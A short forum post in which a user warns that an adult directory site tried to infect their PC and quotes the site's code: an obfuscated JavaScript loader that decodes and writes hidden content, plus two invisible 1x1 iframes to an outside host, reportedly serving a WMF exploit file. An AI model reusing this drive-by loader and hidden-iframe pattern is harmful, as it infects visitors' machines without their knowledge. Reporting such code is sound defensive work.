Thanks SexyBabesDirectory.com for trying to infect my PC. Good thing I was using Firefox and not IE. Not sure who owns this site... Anyone know?
Here is what's in the site:
Quote:
<script language="JavaScript">e = '0x00' + '3D';str1 = %86%DE%D5%C8%A2%CF%CE%C5%D6%D9%81%9C%C8%D5%CF%D5%D C%D5%D6%D5%CE%C5%84%DA%D5%DE%DE%D9%D0%9C%80%86%D5% D8%CC%DD%D1%D9%A2%CF%CC%DF%81%9C%DA%CE%CE%D2%84%93 %93%DF%D6%C8%DF%D0%CE%90%DF%D3%D1%93%CE%CC%D8%93%9 C%A2%CB%D5%DE%CE%DA%81%8D%A2%DA%D9%D5%DB%DA%CE%81% 8D%80%86%93%D5%D8%CC%DD%D1%D9%80%86%93%DE%D5%C8%80 ";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
<iframe src='http://uniqcount.net/adv/066/new.php' width=1 height=1></iframe>
<iframe src='http://uniqcount.net/adv/new.php?adv=66' width=1 height=1></iframe>
|
Tries to download xpl.wmf, but Firefox prompts to download it. Those iframes are also filled with the same trojan code. Not sure what IE would do with it, probably nothing good.
